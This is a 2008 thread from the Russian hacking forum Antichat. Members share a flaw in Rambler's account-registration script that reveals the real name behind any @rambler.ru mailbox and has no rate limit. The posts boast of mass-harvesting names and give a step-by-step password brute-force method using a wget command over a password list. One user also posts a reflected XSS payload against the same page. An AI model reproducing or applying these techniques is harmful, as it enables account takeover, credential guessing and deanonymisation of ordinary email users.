Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   узнать ФамилиюИмя владельца мыла @rambler.ru (https://forum.antichat.xyz/showthread.php?t=73611)

devton 13.06.2008 10:43

узнать ФамилиюИмя владельца мыла @rambler.ru
 
http://id.rambler.ru/script/reg.cgi?password=666&username=luba@rambler.ru

достаточно просто открыть урл в бровзере - и увидите ЛюбаГиоргис - Firsname и Lastname - имя и фамилию, указанные владельцем мыла при регистрации ящика

самое интересное - похоже, нет ограничений на интенсивность обращения к урлу - получилось сделать около 50.000 запросов со скоростью около 20 запросов\сек. Т.е. легко собрать именную базу мыл на Рамблере :)

devton 13.06.2008 10:52

П.С. с помощью этого урла можно еще и брутать пароль к ящику @rambler.ru
Если в теле запрошенной страницы (например, http://id.rambler.ru/script/reg.cgi?password=666666&username=luba@rambler.ru) есть код:
<status>1</status>
значит пароль "666666" подошел!

Учитывая отсутствие ограничений на кол-во\скорость подбора пароля получается неплохой "интерфейс" для брута :)

diman19911 14.06.2008 20:37

а если <status>2</status>
то что тогда пароль не подходит?

mad_xakep 14.06.2008 20:42

хм правду работает! первый раз про это слышу! спс

devton 14.06.2008 20:42

мда блин :) используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

SeTM 14.06.2008 21:08

Цитата:

Сообщение от devton
мда блин :) используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

причем очень легко...

X-Venom 14.06.2008 21:18

Можна это все реализовать в брут пока бага еще свежая=)

devton 14.06.2008 21:43

реализовать в брут :)
писать нич0 не надо - достаточно сгенерить или собрать файлик с паролями, перед каждым паролем вставить "http://id.rambler.ru/script/reg.cgi?username=luba@rambler.ru&password=", сохранить файлик как "brute.txt", запустить:

wget -i brute.txt

и брут начнецца :)

Sleep 14.06.2008 21:51

Пасивная XSS
http://id.rambler.ru/script/reg.cgi?username=<script>alert('XSS')</script>

Vallez 16.06.2008 00:10

devton подскажи способ что бы быстро вставить ссылку перед каждым паролем )


Время: 04:32